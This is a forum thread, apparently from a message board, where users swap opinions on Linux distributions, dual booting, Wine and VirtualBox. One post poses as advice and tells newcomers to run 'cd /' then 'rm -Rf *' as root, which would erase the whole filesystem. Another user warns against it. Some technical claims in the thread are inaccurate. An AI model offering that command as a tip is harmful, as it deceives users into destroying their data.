Re: Linux is AWESOME!!!
If you REALLY want to dive into and fully understand and learn Linux AND get the MOST out of it use Arch Linux.

It's not as easy because you do things manually when you install it but you learn a lot of important things about Linux and how it works.

[link to www.archlinux.org (secure)]

AS for OpenSUSE I don't really like RedHat based distros which OpenSUSE is. Prefer either Debian based ones like Ubuntu or from scratch ones like Arch Linux.
 Quoting: Veresanctus

arch linux is for nerds ... wouldnt suggest that for starters.. i havent bothered trying it because i dont like command lines and hassle to get it running, graphical systems that are fast to install is what i go for

ubuntu is the ultimate noob system .. mint if you arent that fixed on eyecandy and want a fast system thats easy to use.. opensuse if you have some understanding of linux and like eyecandy ..

then theres prob hundreds of other distros of all flavours, but those 3 basically covers all sorts of languages and are easiest to find info for
 Quoting: nerdwegian

Well yes Arch Linux is for those who want to take control of their OS

If you don't want to learn your OS and just use it to check email etc. etc. then Ubuntu, Linux Mint, OpenSUSE, Mageia are good choices in that order
 Quoting: Veresanctus

i guess most want that when they try a new operative system .. they dont want to sit for a week and learn command lines before they figure out how to run firefox
 Quoting: nerdwegian

Sad thing is, back in the day Computers and Operating Systems came with big spiral bound manuals and people would actually LEARN their system through and through and then even program them. But the PC became popular because of grandma and grandpa who just wanted to check email and do a web search so that is most people now.

This I say then, Walk in the Spirit, and ye shall not fulfil the lust of the flesh. For the flesh lusteth against the Spirit, and the Spirit against the flesh: and these are contrary the one to the other: so that ye cannot do the things that ye would. But if ye be led of the Spirit, ye are not under the law.

Now the works of the flesh are manifest, which are these; Adultery, fornication, uncleanness, lasciviousness, Idolatry, witchcraft, hatred, variance, emulations, wrath, strife, seditions, heresies, Envyings, murders, drunkenness, revellings, and such like: of the which I tell you before, as I have also told you in time past, that they which do such things shall not inherit the kingdom of God. But the fruit of the Spirit is love, joy, peace, longsuffering, gentleness, goodness, faith, Meekness, temperance: against such there is no law. And they that are Christ's have crucified the flesh with the affections and lusts.

Re: Linux is AWESOME!!!
I have Linux Mint 14 installed on my Toshiba laptop and it has never crashed on me once. If yours is crashing it has to be you don't have enough RAM or your install got corrupted somehow and might need to be re-installed. Mint is as stable as any of the other Ubuntu based distros (all of which are based off of Debian the most stable Linux there is).

Re: Linux is AWESOME!!!
Oh Cool! Way to go.
If you really want to feel the power of linux type the following lines in a terminal as root.
cd /
rm -Rf *

enjoy!!!

LOVE LOVE LOVE this operating system!!

I went with the big deal first, (Linux Mint) but I didn't like it much to be honest. It had crash issues on my computer, the graphics were messed up a little here and there and I just didn't care for the whole look of it.

I was almost ready to give up and go back to Windows and came across a version of Linux called OpenSuse.

O.M.G.

WHAT A DIFFERENCE!! Much nicer in appearance than Mint and it hasn't crashed on me a single time in the week that I've had it.

I mean this layout is bad ass and the different things you can do with graphics and customizing your desktop are sweet. It runs VERY close to how Windows runs too so you don't have to learn a whole new skill set to get started.

If you're on the fence about Linux, trust me, they have fixed the issues, go for it. You won't regret it. It has no backdoors like Windows does, it's ENCRYPTED, it is ENTIRELY open source which means others can add to it and make it better. You really can't ask for anything more, Linux is the shit.

And it's FREE!! 5a

I have the newest version of OpenSuse, 12.2 with the KDE desktop. If you don't know what that means, like me, it's no problem, the OpenSuse website guides you every step of the way and allows you to choose which desktop you run.

Download the file, burn the image to a DVD and you're done.

I also love being able to keep my Windows with it and I have a choice which one I want to use before the computer boots up.

One thing I have noticed is that Linux doesn't support blueray/HD 1080p, so I keep a copy of Windows on my hard drive that I use solely for that. On the other hand Linux plays streaming HD content MUCH better than the other so I go to OpenSuse for that and general everyday surfing etc.

AMAZING!

If you want to get started, I can help with the setup and questions.

DO NOT DO THIS. Period. It will delete your entire partition.

 Quoting: Anonymous Coward 14068473

NO IT WON'T
Follow the directions and it will install GRUB2 and let you select the OS at boot.

Installers in most current distros work seamlessly to set up dual book.

it is , when all games go to it i will dump windows
 Quoting: AtsuiPanda

OpenSuse has a setting specifically for playing games.

Or, just run Wine.

It is a Windows emulator and will mount and run most Windows programs on Linux. Also check out playonlinux.
 Quoting: Anonymous Coward 34394289

Oh cool , But lets say if the game HAS to have something like direct X to launch will that work too?
 Quoting: AtsuiPanda

You got me on that one.

I'm a Linux noob.

Games are an issue, but Linux is on it for sure. They'll get there probably this year.
 Quoting: Anonymous Coward 34394289

WINE and PlayOnLinux both work

Re: Linux is AWESOME!!!
ill just add this, if your OS is linux and you still need to run the odd windoze program (microsoft visio or something like that, or tax software etc) and it wont run under wine you can install a windoze VM and be able to run both at the same time.

virtualbox is just as good as vmware workstation and it is free:

[link to www.virtualbox.org (secure)]

so you can have an instance of xp or win7 or whatever running at the same time in a vm on your desktop

and for the previous poster about directX i believe virtualbox has experimental accelerated graphics support (when running in full screen mode) and might work for your games. you would have to try it.
 Quoting: Anubis

Yep, unless it's a 3D intensive game. Try running something like Call Of Duty in a VirtualBox, and it won't work.

Unless you do a Hypervisor, which is complicated. But things like Office, Media Player, Photoshop, etc, will work in VirtualBox,
 Quoting: Anonymous Coward 14068473

Or, just keep a copy of Windows next to it and use it for gaming.

Everything else, do on Linux.
 Quoting: Anonymous Coward 34394289

Dual boot. Install Windows first, then Linux on top of it. When you want to game, boot into Windows - it's what I do. Luckily, most of my games are Steam, so I don't even need to do that, really. With WINE upping its game and an open-source port of DirectX coming soon, I won't have a reason to use Windows.
 Quoting: Anonymous Coward 14068473

Native Steam on Linux is Da Shiznet! 6 more months and it will be perfect.

I recently took the Linux plunge again with Mint as well (Cinnamon). Tried Ubunutu and a few other distros a few years ago and didn't really like it... It was interesting for a few days but I didn't like the Cinnamon desktop that much... Decided to try Ubuntu 12.10 earlier today and Unity is much better than it once was (liked it more than Cinnamon actually)... but again, not really "feeling it". There's a few Windows apps that I just can't live without and Wine... although does the trick for the most part, is a little buggy.
